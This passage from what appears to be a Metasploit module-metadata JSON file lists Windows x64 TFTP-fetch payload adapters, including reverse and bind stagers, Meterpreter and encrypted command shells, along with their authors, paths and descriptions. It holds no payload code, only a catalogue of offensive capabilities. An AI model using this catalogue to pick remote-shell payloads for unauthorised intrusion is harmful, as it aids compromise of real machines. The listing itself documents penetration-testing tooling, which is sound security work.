"targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/tftp/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_winhttp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_winhttps": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": { - "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/encrypted_shell_reverse_tcp": { - "name": "TFTP Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell", - 
"references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/exec": { - "name": "TFTP Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/tftp/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/tftp/x64/loadlibrary": { - "name": "TFTP Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/tftp/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from 
a TFTP server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/tftp/x64/messagebox": { - "name": "TFTP Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/tftp/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp", - "aliases": 
[], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", 
- "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_http": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": 
"payload/cmd/windows/tftp/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_https": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_named_pipe": { - "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - 
"payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - 
"stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttp": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttps": { - "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/meterpreter_bind_named_pipe": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_bind_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. 
